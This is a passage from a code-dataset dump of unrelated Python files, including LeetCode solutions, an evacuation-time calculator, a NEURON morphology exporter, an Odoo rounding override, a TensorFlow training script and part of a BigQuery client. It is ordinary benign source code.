x1\n\nprint(x)\n\n","sub_path":"problem-5.py","file_name":"problem-5.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"286633079","text":"# -*- coding: utf-8 -*-\nimport pytest\n\n\n@pytest.mark.unit\n@pytest.mark.parametrize(\"key, expected_value\", [\n (\"__name__\", \"rb_tutorial\"),\n (\"__description__\", \"Rogue Basin's Complete Python 3 Tutorial\"),\n (\"__author__\", \"Brian Bruggeman\"),\n (\"__author_email__\", \"brian.m.bruggeman@gmail.com\"),\n (\"__maintainer__\", \"Brian Bruggeman\"),\n (\"__maintainer_email__\", \"brian.m.bruggeman@gmail.com\"),\n (\"__url__\", \"http://www.pypi.org\"),\n (\"__version__\", \"0.1.0\"),\n (\"__version_info__\", (0, 1, 0)),\n])\ndef test_project_metadata(key, expected_value):\n import rb_tutorial\n\n fields = [_ for _ in dir(rb_tutorial)]\n value = getattr(rb_tutorial, key, None)\n assert key in fields\n assert value == expected_value\n\n\n@pytest.mark.unit\n@pytest.mark.parametrize(\"exc_name\", [\n 'BaseException'\n])\ndef test_project_exceptions(exc_name):\n from rb_tutorial import exceptions\n\n assert hasattr(exceptions, exc_name)\n Exception = getattr(exceptions, exc_name)\n with pytest.raises(Exception):\n raise Exception()\n","sub_path":"tests/test_rb_tutorial.py","file_name":"test_rb_tutorial.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"245454863","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def numComponents(self, head, G):\n \"\"\"\n :type head: ListNode\n :type G: List[int]\n :rtype: int\n \"\"\"\n if head is None:\n return 0\n if head.next is None:\n if head.val in G:\n return 1\n else:\n return 0\n\n summ = 0\n dummy = ListNode(-1)\n dummy.next = head\n status = 'N'\n cur = dummy\n while cur.next is not None:\n prev = status\n cur = cur.next\n if cur.val in G:\n status = 'Y'\n else:\n status = 'N'\n\n if status == 'Y' and prev == 'N':\n summ += 1\n else:\n pass\n return summ\n\n","sub_path":"code/817. Linked List Components.py","file_name":"817. 
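# [Editor's note] Despite its docstring, problem-5.py above applies the SR1
# secant update H += (y - H s)(y - H s)^T / ((y - H s)^T s) to the Hessian
# approximation H. The textbook DFP update acts on the inverse Hessian G
# instead -- a numpy-only sketch with s, y as (n, 1) column vectors:
import numpy as np

def dfp_update(G, s, y):
    Gy = G.dot(y)
    return (G - Gy.dot(Gy.T) / y.T.dot(Gy).item()
            + s.dot(s.T) / y.T.dot(s).item())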
Linked List Components.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"84859388","text":"class Solution:\n def reverse(self, x):\n if x>-10 and x<10:\n return x\n\n result=0\n if x>0:\n while x>0:\n result=result*10+x%10\n x//=10\n result = 0 if result > pow(2, 31) else result\n else:\n x=-x\n while x>0:\n result=result*10+x%10\n x//=10\n result = 0 if result > pow(2, 31) else result\n result=-result\n return 0 if result > pow(2, 31) else result\n def reverse_ref(self, x):\n result = 0\n if x < 0:\n symbol = -1\n x = -x\n else:\n symbol = 1\n while x:\n result = result * 10 + x % 10\n x //= 10\n\n return 0 if result > pow(2, 31) else result * symbol\n\nnums = [2, 90,3,65,7, 12, 15]\ntarget = -579\ns=Solution()\nprint(s.reverse(target))\nprint(s.reverse(target))","sub_path":"src/0007.reverse-integer/my_reverse-integer.py","file_name":"my_reverse-integer.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"407937946","text":"import csv\n\nfrom PublicClass.storeObject import store_arc_obj, store_group\nfrom config import speed, library_proportion, floor\n\n\"\"\"\n 2019/3/16\n Heng Du\n 为 solution.py 提供了基本操作方法\n 计算同一出口下相邻两个疏散组 疏散等待时间 以及疏散正常需要时间\n 并计算了每个出口的所需要花费的时间,将所有出口根据时间花费的大小\n 从大到小排序,花费时间最多的出口,也就是此楼层所有人员疏散所花费的最终时间\n\n\"\"\"\n\ncurr_floor = int(floor/100)\n\n# 计算任意一个路线的上所以弧线长度和\ndef cal_distance_of_mult_arcs(path):\n arc_db = store_arc_obj()\n sum_distance = 0\n for index in range(0, (len(path) - 1)):\n # print(path[index], path[index + 1])\n for arc in arc_db:\n if path[index] == arc[0] and path[index + 1] == arc[1]:\n sum_distance += arc[2] * library_proportion\n sum_distance = float('%.1f' % sum_distance)\n return sum_distance\n\n\ndef same_path(path1, path2):\n q1 = path1[3] # path1 的队长度\n q2 = path2[3]\n t_wait = float('%.1f' % (q1 / speed))\n # print('疏散组' + path1[0] + ' 所需时间:' +\n # str(path1[4]) + 's 疏散组' + path2[0] + ' 正常所需时间:' +\n # str(path2[4]) + 's')\n # print('疏散组' + path2[0] + ' 需等待' + str(t_wait) + 's')\n tuple = (path2[0], t_wait, path2[4])\n return tuple\n\n# Type1 路径共享\n# 如:a [ A —> B -> C ] b [ B -> C ] a 与 b 路径共享\ndef share_path(path1, path2):\n # print(path1, path2)\n # print(path1[2], path2[2])\n length = len(path1[2])\n q1 = path1[3] # path1 的队长度\n q2 = path2[3] # path2 的队长度\n list1 = path1[2][1:length]\n list2 = path2[2]\n # 求路径中非共同路径部分的长度\n diff_element = [ i for i in list2 if i not in list1 ]\n # print(diff_element)\n sum_diff_distance = cal_distance_of_mult_arcs(diff_element)\n # print(\"非共同路径部分长度为:\", end='')\n # print(sum_diff_distance)\n # print('q1 长度:' + str(q1) + ' q2 长度' + str(q2))\n if q1 <= sum_diff_distance:\n t_wait = 0\n else:\n t_wait = float('%.1f' % ((q1 - sum_diff_distance) / speed))\n # print('疏散组' + path1[0] + ' 所需时间:' +\n # str(path1[4]) + 's 疏散组'+ path2[0] + ' ���常所需时间:' +\n # str(path2[4]) + 's')\n # print('疏散组' + path2[0] + ' 需等待' + str(t_wait) + 's')\n tuple = (path2[0], t_wait, path2[4])\n return tuple\n\n\n# Type2 路径完全不共享(出口结点除外,无任何交点)\n# 如:a [ A -> C ] b [ B -> C ] a 与 b 路径完全不共享\n# Type3 路径部分共享(出口结点除外,有大于或等于一个结点相交,但又不属于type1)\n# 如:a [ A -> C -> D] b [ B -> C -> D] a 与 b 路径部分共享\ndef no_share_path(path1, path2):\n # print(path1, path2)\n q1 = path1[3] # path1 的队长度\n q2 = path2[3] # path2 的队长度\n d1 = path1[1] # path1 的路线距离\n d2 = path2[1] # path2 的路线距离\n if d1 == d2:\n t_wait = float('%.1f' % (q1 / speed))\n else:\n if d2 >= (d1 + q1):\n t_wait = 
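# [Editor's sketch] The numComponents state machine above can be phrased as a
# single pass that counts component starts: a component begins at every node
# whose value is in G while its predecessor's was not (set(G) makes each
# lookup O(1)):
def num_components(head, G):
    G, count, prev_in = set(G), 0, False
    while head:
        in_g = head.val in G
        if in_g and not prev_in:
            count += 1
        prev_in = in_g
        head = head.next
    return count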
0\n else:\n t_wait = float('%.1f' % ((d1+q1-d2) / speed))\n # print('疏散组' + path1[0] + ' 所需时间:' +\n # str(path1[4]) + 's 疏散组'+ path2[0] +' 正常所需时间:' +\n # str(path2[4]) + 's')\n # print('疏散组' + path2[0] + ' 需等待' + str(t_wait) + 's')\n tuple = (path2[0], t_wait, path2[4])\n return tuple\n\n\n# 判断相邻两个路径的类型\n# 输入: path1 离出口相对近的那条路径,\n# path2 离出口相对远的那条路径\n# 输出: 两条路径所属路径类型path_type\ndef type_of_two_path(path1, path2):\n # print(\"path1, path2\")\n # print(path1[2], path2[2])\n\n if set(path1[2]) < set(path2[2]):\n # print(\"------Type1 路径共享-----------\")\n tuple = share_path(path1, path2)\n # print(\"------Type1 END----------------\\n\")\n elif set(path1[2]) == set(path2[2]):\n # print(\"------Type1 同一房间-----------\")\n tuple = same_path(path1, path2)\n # print(\"------Type1 END----------------\\n\")\n else:\n # print(\"---Type2&3 路径完全不共享&路径部分共享------\")\n tuple = no_share_path(path1, path2)\n # print(\"------Type2& 3 END----------------\\n\")\n return tuple\n\n\n# 对比每相邻两个疏散组的类型,\n# 并计算出等待时间和疏散组花费的时间\n# def cal_wait_time(groud_by_exit_db):\n# time_list_all_exits = []\n# for i in groud_by_exit_db:\n# # print(i)\n# iteri = iter(i)\n# exit_id = next(iteri)\n# # print('\\033[31m', end='')\n# # print(str(exit_id) + '出口疏散情况:')\n# # print('\\033[0m', end='')\n# #\n# # print('\\033[0;36m', end='')\n# # print('[(疏散组id, 距离, 路径, 队长, 正常需要时间)]')\n# # print('\\033[0m', end='')\n#\n# time_list_every_exit = []\n# time_list_every_exit.append(exit_id)\n# paths = next(iteri)\n# if len(paths) >= 2:\n# # print(paths)\n# for index in range(0,(len(paths) -1)):\n# # print(paths[index], paths[index+1])\n# # 把最近的疏散组添加到列表里\n# if index == 0:\n# tuple = (paths[index][0], 0, paths[index][4])\n# time_list_every_exit.append(tuple)\n# else:\n# tuple = type_of_two_path(paths[index], paths[index+1])\n# time_list_every_exit.append(tuple)\n# elif len(paths) == 1:\n# # print(paths)\n# # print(\"------Type4:该出口只有一个疏散组--------\")\n# # print('疏散组'+ paths[0][0] + ' 所需时间:' +\n# # str(paths[0][4]) + 's')\n# # print('需等待 0s')\n#\n#\n# tuple = (paths[0][0], 0, paths[0][4])\n#\n#\n# time_list_every_exit.append(tuple)\n# # print(\"------Type4 END----------------\\n\")\n# else:\n# print(\"------Type5:该出口闲置--------\")\n# # print(\"------Type5 END----------------\\n\")\n#\n# time_list_all_exits.append(time_list_every_exit)\n# return time_list_all_exits\ndef cal_wait_time(groud_by_exit_db):\n time_list_all_exits = []\n for i in groud_by_exit_db:\n # print(i)\n iteri = iter(i)\n exit_id = next(iteri)\n # print('\\033[31m', end='')\n # print(str(exit_id) + '出口疏散情况:')\n # print('\\033[0m', end='')\n #\n # print('\\033[0;36m', end='')\n # print('[(疏散组id, 距离, 路径, 队长, 正常需要时间)]')\n # print('\\033[0m', end='')\n\n time_list_every_exit = []\n time_list_every_exit.append(exit_id)\n paths = next(iteri)\n if len(paths) >= 2:\n # print(paths)\n for index in range(0,(len(paths) -1)):\n # print(paths[index], paths[index+1])\n # 把最近的疏散组添加到列表里\n if index == 0:\n tuple = (paths[index][0], 0, paths[index][4])\n time_list_every_exit.append(tuple)\n tuple = type_of_two_path(paths[index], paths[index+1])\n time_list_every_exit.append(tuple)\n elif len(paths) == 1:\n # print(paths)\n # print(\"------Type4:该出口只有一个疏散组--------\")\n # print('疏散组'+ paths[0][0] + ' 所需时间:' +\n # str(paths[0][4]) + 's')\n # print('需等待 0s')\n tuple = (paths[0][0], 0, paths[0][4])\n time_list_every_exit.append(tuple)\n # print(\"------Type4 END----------------\\n\")\n else:\n print(\"------Type5:该出口闲置--------\")\n # print(\"------Type5 END----------------\\n\")\n\n 
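# [Editor's note] The rule that no_share_path above implements (its comments
# are in Chinese): for two non-overlapping routes to the same exit, the later
# group waits only while the leader's route length d1 plus its queue length q1
# still exceeds its own route length d2. Distilled:
def wait_time_no_share(q1, d1, d2, speed):
    if d1 == d2:
        return q1 / speed          # equal routes: the whole queue must drain
    return 0.0 if d2 >= d1 + q1 else (d1 + q1 - d2) / speed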
time_list_all_exits.append(time_list_every_exit)\n return time_list_all_exits\n\n\n\n\n# 将cal_wait_time 得出的等待时间和疏散花费时间进行分析处理\n# 得到形如 [207, ('2', 0, 48.4), ('1', 10.9, 95.5)] 数据格式\n# [出口, (疏散组id ,疏散组等待时间 ,疏散组正常通过时间)]\ndef get_final_result(time_list_all_exits):\n print('计算每个出口实际需要的时间')\n print('[出口id, (疏散组id ,疏散组等待时间 ,疏散组正常通过时间)]')\n sum_wait_time = 0\n final_result = []\n for i in time_list_all_exits:\n print(i)\n if len(i) == 1:\n tuple = (i[0], 0)\n else:\n sum = i[len(i)-1][2]\n for j in range(1, len(i)):\n sum += i[j][1]\n sum_wait_time += i[j][1]\n tuple = (i[0], float('%.1f' % sum))\n final_result.append(tuple)\n sorted_final_result = sorted(final_result, key=lambda x:x[1], reverse=True)\n print('等待时间')\n print(float('%.1f' % sum_wait_time))\n\n # out = open('D:\\\\AProgram\\\\evacuateProg\\\\output\\\\balance.csv', 'a', newline='')\n # csv_write = csv.writer(out, dialect='excel')\n # db = []\n # db.append(float('%.1f' % sum_wait_time))\n # db.append(sorted_final_result[-1])\n # csv_write.writerow(db)\n # out.close()\n return sorted_final_result\n\n\n\n# 更新疏散组信息\ndef update_group(temp_solution_item, temp_group):\n updated_solution = ()\n group_db = store_group()\n for g in group_db:\n if g.group_id == temp_group:\n g.set_attributes(temp_solution_item[2], temp_solution_item[0])\n # g.print() # 更新group后的信息\n updated_solution = (g.group_id, g.distance, g.paths, g.num, float(g.pass_time()))\n print(updated_solution)\n return updated_solution","sub_path":"evacuateProg/PublicClass/solutionClasses.py","file_name":"solutionClasses.py","file_ext":"py","file_size_in_byte":9869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"501537281","text":"from neuron import h\nimport numpy\nimport json\nfrom urllib.request import urlopen\nimport os\nimport sys\nimport math\nimport re\n\n\nh.define_shape()\n\ndef get_pts_between(x, y, z, d, arc, lo, hi):\n left_x = numpy.interp(lo, arc, x, left=x[0], right=x[-1])\n left_y = numpy.interp(lo, arc, y, left=y[0], right=y[-1])\n left_z = numpy.interp(lo, arc, z, left=z[0], right=z[-1])\n left_d = numpy.interp(lo, arc, d, left=d[0], right=d[-1])\n right_x = numpy.interp(hi, arc, x, left=x[0], right=x[-1])\n right_y = numpy.interp(hi, arc, y, left=y[0], right=y[-1])\n right_z = numpy.interp(hi, arc, z, left=z[0], right=z[-1])\n right_d = numpy.interp(hi, arc, d, left=x[0], right=d[-1])\n in_between = [[x0, y0, z0, d0] for (x0, y0, z0, d0, a0) in zip(x, y, z, d, arc) if lo < a0 < hi]\n if len(in_between) == 0:\n # ensure there is at least one interior point\n in_between = [[(left_x + right_x) * 0.5, (left_y + right_y) * 0.5, (left_z + right_z) * 0.5, (left_d + right_d) * 0.5]]\n return [[left_x, left_y, left_z, left_d]] + in_between + [[right_x, right_y, right_z, right_d]]\n\ndef get_root(sec):\n return h.SectionRef(sec=sec).root().sec\n\nroot_sections = []\nfor sec in h.allsec():\n if not h.SectionRef(sec).has_parent():\n root_sections.append(sec)\n\n\ndef pt_from_seg(seg):\n sec = seg.sec\n n = int(h.n3d(sec=sec))\n x = [h.x3d(i, sec=sec) for i in range(n)]\n y = [h.y3d(i, sec=sec) for i in range(n)]\n z = [h.z3d(i, sec=sec) for i in range(n)]\n arc = [h.arc3d(i, sec=sec) for i in range(n)]\n f = seg.x * sec.L\n return (numpy.interp(f, arc, x), numpy.interp(f, arc, y), numpy.interp(f, arc, z))\n\n\n\ndef morph_per_root(root):\n morph = []\n h.define_shape()\n for sec in secs_with_root(root):\n n3d = int(h.n3d(sec=sec))\n x = [h.x3d(i, sec=sec) for i in range(n3d)]\n y = [h.y3d(i, sec=sec) for i in 
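# [Editor's sketch] get_pts_between above leans on numpy.interp to sample a
# coordinate at an arbitrary arc length along a section; the core idiom is:
import numpy as np

arc = [0.0, 5.0, 10.0]           # cumulative arc length of the stored 3-D points
xs = [0.0, 3.0, 4.0]             # one coordinate channel at those arc lengths
x_at = np.interp(7.5, arc, xs)   # -> 3.5, linear interpolation between samples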
range(n3d)]\n z = [h.z3d(i, sec=sec) for i in range(n3d)]\n d = [h.diam3d(i, sec=sec) for i in range(n3d)]\n arc = [h.arc3d(i, sec=sec) for i in range(n3d)]\n length = sec.L\n half_dx = 0.5 / sec.nseg\n for seg in sec:\n morph.append(get_pts_between(x, y, z, d, arc, (seg.x - half_dx) * length, (seg.x + half_dx) * length))\n \n # add end points\n for end_pt in [0, 1]:\n for sec in secs_with_root(root):\n n3d = int(h.n3d(sec=sec))\n pt1 = [h.x3d(0, sec=sec), h.y3d(0, sec=sec), h.z3d(0, sec=sec), h.diam3d(0, sec=sec)]\n pt2 = [h.x3d(n3d - 1, sec=sec), h.y3d(n3d - 1, sec=sec), h.z3d(n3d - 1, sec=sec), h.diam3d(n3d - 1, sec=sec)]\n if h.section_orientation(sec=sec) == 0:\n morph.append([pt1] if end_pt == 0 else [pt2])\n else:\n morph.append([pt2] if end_pt == 0 else [pt1])\n return morph\n\n\ndef secs_with_root(root):\n return [sec for sec in h.allsec() if get_root(sec) == root]\n\nwith open('morphology.txt', 'w') as f:\n for root in root_sections:\n f.write(json.dumps(morph_per_root(root)))\n\n","sub_path":"json_generator/write_morphology.py","file_name":"write_morphology.py","file_ext":"py","file_size_in_byte":3027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"369561272","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import fields,api,models,_\nimport math\n\nclass sale_order(models.Model):\n _inherit = 'sale.order'\n\n amount_round_off = fields.Float(compute='_amount_all',string='Round off',readonly=True)\n\n @api.depends('order_line.price_total')\n def _amount_all(self):\n for order in self:\n amount_untaxed = amount_tax = 0.0\n for line in order.order_line:\n amount_untaxed += line.price_subtotal\n # FORWARDPORT UP TO 10.0\n if order.company_id.tax_calculation_rounding_method == 'round_globally':\n taxes = line.taxes_id.compute_all(line.price_unit, line.order_id.currency_id, line.product_qty, product=line.product_id, partner=line.order_id.partner_id)\n amount_tax += sum(t.get('amount', 0.0) for t in taxes.get('taxes', []))\n else:\n amount_tax += line.price_tax\n order.update({\n 'amount_untaxed': order.currency_id.round(amount_untaxed),\n 'amount_tax': order.currency_id.round(amount_tax),\n 'amount_total': amount_untaxed + amount_tax,\n })\n if self:\n amount_total = round(math.ceil(self.amount_total))\n amount_round_off = amount_total - self.amount_total\n order.update({\n 'amount_total': amount_total,\n 'amount_round_off': amount_round_off})\n else:\n amount_total = order.amount_total\n order.update({\n 'amount_total': amount_total,\n 'amount_round_off': 0.0\n })\n return True ","sub_path":"account_roundoff/models/sale.py","file_name":"sale.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"617791106","text":"import sys\n\nimport tensorflow as tf\n\nfrom separable_resnet import SeparableResnet\n\nflags = tf.app.flags\nFLAGS = flags.FLAGS\n\nimage_size = 224\nflags.DEFINE_integer('batch_size', 256, 'Size of each training batch')\nflags.DEFINE_string('dataset_dir', '', 'Size of each training batch')\n\n# Preprocessing Flags (only affect training data, not validation data)\nCHECKPOINT_FOLDER = \"checkpoints\"\nCHECKPOINT_STEP = 800\nCHECKPOINT_NAME = \"SEP-RESNET-34-imagenet\"\nVALIDATION_STEP = 150\n\n\n\nclass Train:\n def __init__(self):\n gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.9)\n\n self.graph = tf.Graph()\n\n with self.graph.as_default():\n self.model = SeparableResnet(training=True, 
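# [Editor's sketch] The sale-order override above, in isolation: the grand
# total is ceiled to the next whole currency unit and the difference is stored
# as the round-off so the printed amounts still reconcile:
import math

def round_off(amount_total):
    rounded = float(math.ceil(amount_total))
    return rounded, rounded - amount_total
# round_off(101.35) -> (102.0, ~0.65, up to float rounding). In Python 3 the
# original's outer round(...) is redundant, since math.ceil returns an int.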
batch_size=FLAGS.batch_size, dataset_dir=FLAGS.dataset_dir)\n\n self.session = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options), graph=self.graph)\n\n def train(self):\n with self.graph.as_default():\n self.session.run(tf.variables_initializer(tf.local_variables()))\n merged = tf.summary.merge_all()\n train_writer = tf.summary.FileWriter(\"summaries/train\", self.graph)\n test_writer = tf.summary.FileWriter(\"summaries/test\", self.graph)\n saver = tf.train.Saver(max_to_keep=10)\n\n latest_checkpoint = tf.train.latest_checkpoint(CHECKPOINT_FOLDER)\n self.session.run(tf.variables_initializer(tf.local_variables()))\n\n if latest_checkpoint:\n self.log(\"loading from checkpoint file: \" + latest_checkpoint)\n saver.restore(self.session, latest_checkpoint)\n else:\n self.log(\"checkpoint not found, initializing variables.\")\n self.session.run(tf.variables_initializer(tf.global_variables()))\n\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=self.session, coord=coord)\n s = 0\n try:\n while not coord.should_stop():\n m, _, loss, step, = self.session.run([merged,\n self.model.train_step,\n self.model.loss,\n self.model.global_step],\n feed_dict={self.model.do_validate: False})\n\n train_writer.add_summary(m, step)\n if step % VALIDATION_STEP == 0:\n m, top1, = self.session.run([merged, self.model.top_1_accuracy],\n feed_dict={self.model.do_validate: True})\n test_writer.add_summary(m, step)\n\n if step % CHECKPOINT_STEP == 0:\n saver.save(self.session, CHECKPOINT_FOLDER + '/' + CHECKPOINT_NAME, global_step=step)\n s = step\n except tf.errors.OutOfRangeError:\n self.log('Done training -- epoch limit reached')\n finally:\n self.log('getting a last checkpoint before dying')\n saver.save(self.session, CHECKPOINT_FOLDER + '/' + CHECKPOINT_NAME, global_step=s)\n coord.request_stop()\n\n coord.join(threads)\n self.session.close()\n\n @staticmethod\n def log(message):\n sys.stdout.write(message + \"\\n\")\n sys.stdout.flush()\n pass\n\n\ndef main(_):\n t = Train()\n t.train()\n\n\nif __name__ == '__main__':\n tf.app.run()\n","sub_path":"model/imagenet/train_multiple.py","file_name":"train_multiple.py","file_ext":"py","file_size_in_byte":3542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"458315576","text":"\n\nfrom xai.brain.wordbase.nouns._mortician import _MORTICIAN\n\n#calss header\nclass _MORTICIANS(_MORTICIAN, ):\n\tdef __init__(self,): \n\t\t_MORTICIAN.__init__(self)\n\t\tself.name = \"MORTICIANS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"mortician\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_morticians.py","file_name":"_morticians.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"26427855","text":"# -*- coding: utf-8 -*-\n# Copyright 2023 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nfrom collections import OrderedDict\nimport functools\nimport re\nfrom 
typing import (\n Dict,\n Mapping,\n MutableMapping,\n MutableSequence,\n Optional,\n AsyncIterable,\n Awaitable,\n AsyncIterator,\n Sequence,\n Tuple,\n Type,\n Union,\n)\n\nfrom google.cloud.bigquery_storage_v1beta2 import gapic_version as package_version\n\nfrom google.api_core.client_options import ClientOptions\nfrom google.api_core import exceptions as core_exceptions\nfrom google.api_core import gapic_v1\nfrom google.api_core import retry as retries\nfrom google.auth import credentials as ga_credentials # type: ignore\nfrom google.oauth2 import service_account # type: ignore\n\ntry:\n OptionalRetry = Union[retries.Retry, gapic_v1.method._MethodDefault]\nexcept AttributeError: # pragma: NO COVER\n OptionalRetry = Union[retries.Retry, object] # type: ignore\n\nfrom google.cloud.bigquery_storage_v1beta2.types import storage\nfrom google.cloud.bigquery_storage_v1beta2.types import stream\nfrom google.cloud.bigquery_storage_v1beta2.types import table\nfrom google.protobuf import timestamp_pb2 # type: ignore\nfrom google.rpc import status_pb2 # type: ignore\nfrom .transports.base import BigQueryWriteTransport, DEFAULT_CLIENT_INFO\nfrom .transports.grpc_asyncio import BigQueryWriteGrpcAsyncIOTransport\nfrom .client import BigQueryWriteClient\n\n\nclass BigQueryWriteAsyncClient:\n \"\"\"BigQuery Write API.\n\n The Write API can be used to write data to BigQuery.\n\n The `google.cloud.bigquery.storage.v1\n API `__\n should be used instead of the v1beta2 API for BigQueryWrite\n operations.\n \"\"\"\n\n _client: BigQueryWriteClient\n\n DEFAULT_ENDPOINT = BigQueryWriteClient.DEFAULT_ENDPOINT\n DEFAULT_MTLS_ENDPOINT = BigQueryWriteClient.DEFAULT_MTLS_ENDPOINT\n\n table_path = staticmethod(BigQueryWriteClient.table_path)\n parse_table_path = staticmethod(BigQueryWriteClient.parse_table_path)\n write_stream_path = staticmethod(BigQueryWriteClient.write_stream_path)\n parse_write_stream_path = staticmethod(BigQueryWriteClient.parse_write_stream_path)\n common_billing_account_path = staticmethod(\n BigQueryWriteClient.common_billing_account_path\n )\n parse_common_billing_account_path = staticmethod(\n BigQueryWriteClient.parse_common_billing_account_path\n )\n common_folder_path = staticmethod(BigQueryWriteClient.common_folder_path)\n parse_common_folder_path = staticmethod(\n BigQueryWriteClient.parse_common_folder_path\n )\n common_organization_path = staticmethod(\n BigQueryWriteClient.common_organization_path\n )\n parse_common_organization_path = staticmethod(\n BigQueryWriteClient.parse_common_organization_path\n )\n common_project_path = staticmethod(BigQueryWriteClient.common_project_path)\n parse_common_project_path = staticmethod(\n BigQueryWriteClient.parse_common_project_path\n )\n common_location_path = staticmethod(BigQueryWriteClient.common_location_path)\n parse_common_location_path = staticmethod(\n BigQueryWriteClient.parse_common_location_path\n )\n\n @classmethod\n def from_service_account_info(cls, info: dict, *args, **kwargs):\n \"\"\"Creates an instance of this client using the provided credentials\n info.\n\n Args:\n info (dict): The service account private key info.\n args: Additional arguments to pass to the constructor.\n kwargs: Additional arguments to pass to the constructor.\n\n Returns:\n BigQueryWriteAsyncClient: The constructed client.\n \"\"\"\n return BigQueryWriteClient.from_service_account_info.__func__(BigQueryWriteAsyncClient, info, *args, **kwargs) # type: ignore\n\n @classmethod\n def from_service_account_file(cls, filename: str, *args, **kwargs):\n 
\"\"\"Creates an instance of this client using the provided credentials\n file.\n\n Args:\n filename (str): The path to the service account private key json\n file.\n args: Additional arguments to pass to the constructor.\n kwargs: Additional arguments to pass to the constructor.\n\n Returns:\n BigQueryWriteAsyncClient: The constructed client.\n \"\"\"\n return BigQueryWriteClient.from_service_account_file.__func__(BigQueryWriteAsyncClient, filename, *args, **kwargs) # type: ignore\n\n from_service_account_json = from_service_account_file\n\n @classmethod\n def get_mtls_endpoint_and_cert_source(\n cls, client_options: Optional[ClientOptions] = None\n ):\n \"\"\"Return the API endpoint and client cert source for mutual TLS.\n\n The client cert source is determined in the following order:\n (1) if `GOOGLE_API_USE_CLIENT_CERTIFICATE` environment variable is not \"true\", the\n client cert source is None.\n (2) if `client_options.client_cert_source` is provided, use the provided one; if the\n default client cert source exists, use the default one; otherwise the client cert\n source is None.\n\n The API endpoint is determined in the following order:\n (1) if `client_options.api_endpoint` if provided, use the provided one.\n (2) if `GOOGLE_API_USE_CLIENT_CERTIFICATE` environment variable is \"always\", use the\n default mTLS endpoint; if the environment variable is \"never\", use the default API\n endpoint; otherwise if client cert source exists, use the default mTLS endpoint, otherwise\n use the default API endpoint.\n\n More details can be found at https://google.aip.dev/auth/4114.\n\n Args:\n client_options (google.api_core.client_options.ClientOptions): Custom options for the\n client. Only the `api_endpoint` and `client_cert_source` properties may be used\n in this method.\n\n Returns:\n Tuple[str, Callable[[], Tuple[bytes, bytes]]]: returns the API endpoint and the\n client cert source to use.\n\n Raises:\n google.auth.exceptions.MutualTLSChannelError: If any errors happen.\n \"\"\"\n return BigQueryWriteClient.get_mtls_endpoint_and_cert_source(client_options) # type: ignore\n\n @property\n def transport(self) -> BigQueryWriteTransport:\n \"\"\"Returns the transport used by the client instance.\n\n Returns:\n BigQueryWriteTransport: The transport used by the client instance.\n \"\"\"\n return self._client.transport\n\n get_transport_class = functools.partial(\n type(BigQueryWriteClient).get_transport_class, type(BigQueryWriteClient)\n )\n\n def __init__(\n self,\n *,\n credentials: Optional[ga_credentials.Credentials] = None,\n transport: Union[str, BigQueryWriteTransport] = \"grpc_asyncio\",\n client_options: Optional[ClientOptions] = None,\n client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,\n ) -> None:\n \"\"\"Instantiates the big query write client.\n\n Args:\n credentials (Optional[google.auth.credentials.Credentials]): The\n authorization credentials to attach to requests. These\n credentials identify the application to the service; if none\n are specified, the client will attempt to ascertain the\n credentials from the environment.\n transport (Union[str, ~.BigQueryWriteTransport]): The\n transport to use. If set to None, a transport is chosen\n automatically.\n client_options (ClientOptions): Custom options for the client. It\n won't take effect if a ``transport`` instance is provided.\n (1) The ``api_endpoint`` property can be used to override the\n default endpoint provided by the client. 
GOOGLE_API_USE_MTLS_ENDPOINT\n environment variable can also be used to override the endpoint:\n \"always\" (always use the default mTLS endpoint), \"never\" (always\n use the default regular endpoint) and \"auto\" (auto switch to the\n default mTLS endpoint if client certificate is present, this is\n the default value). However, the ``api_endpoint`` property takes\n precedence if provided.\n (2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable\n is \"true\", then the ``client_cert_source`` property can be used\n to provide client certificate for mutual TLS transport. If\n not provided, the default SSL client certificate will be used if\n present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is \"false\" or not\n set, no client certificate will be used.\n\n Raises:\n google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport\n creation failed for any reason.\n \"\"\"\n self._client = BigQueryWriteClient(\n credentials=credentials,\n transport=transport,\n client_options=client_options,\n client_info=client_info,\n )\n\n async def create_write_stream(\n self,\n request: Optional[Union[storage.CreateWriteStreamRequest, dict]] = None,\n *,\n parent: Optional[str] = None,\n write_stream: Optional[stream.WriteStream] = None,\n retry: OptionalRetry = gapic_v1.method.DEFAULT,\n timeout: Union[float, object] = gapic_v1.method.DEFAULT,\n metadata: Sequence[Tuple[str, str]] = 